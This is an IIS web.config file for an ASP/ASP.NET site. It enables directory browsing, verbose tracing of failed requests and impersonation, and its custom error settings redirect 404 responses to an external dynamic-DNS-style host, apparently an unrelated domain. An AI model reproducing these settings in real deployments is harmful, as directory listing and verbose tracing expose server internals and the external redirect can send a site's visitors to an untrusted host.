<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <directoryBrowse enabled="true" showFlags="Date, Time, Size, Extension, LongDate" />
        <tracing>
            <traceFailedRequests>
                <add path="*">
                    <traceAreas>
                        <add provider="ASP" verbosity="Verbose" />
                        <add provider="ASPNET" areas="Infrastructure,Module,Page,AppServices" verbosity="Verbose" />
                        <add provider="ISAPI Extension" verbosity="Verbose" />
                        <add provider="WWW Server" areas="Authentication,Security,Filter,StaticFile,CGI,Compression,Cache,RequestNotifications,Module,FastCGI,WebSocket" verbosity="Verbose" />
                    </traceAreas>
                    <failureDefinitions timeTaken="00:00:10" verbosity="Error" />
                </add>
            </traceFailedRequests>
        </tracing>
        <defaultDocument>
            <files>
                <clear />
                <add value="index.html" />
                <add value="new_file.html" />
                <add value="about.html" />
                <add value="Default.htm" />
                <add value="Default.asp" />
                <add value="index.htm" />
                <add value="iisstart.htm" />
                <add value="default.aspx" />
            </files>
        </defaultDocument>
        <httpErrors errorMode="Custom" defaultResponseMode="File">
            <remove statusCode="404" subStatusCode="-1" />
            <error statusCode="404" path="/404.html" responseMode="ExecuteURL" />
        </httpErrors>
    </system.webServer>
    <system.web>
        <compilation defaultLanguage="vb" />
        <roleManager enabled="true" />
        <membership defaultProvider="AspNetSqlMembershipProvider" />
        <identity impersonate="true" />
        <profile>
            <properties>
                <group name="00去1" />
            </properties>
        </profile>
        <customErrors defaultRedirect="http://2998c761m5.wicp.vip/404.html">
            <error redirect="http://2998c761m5.wicp.vip/404.html" statusCode="404" />
        </customErrors>
    </system.web>
</configuration>
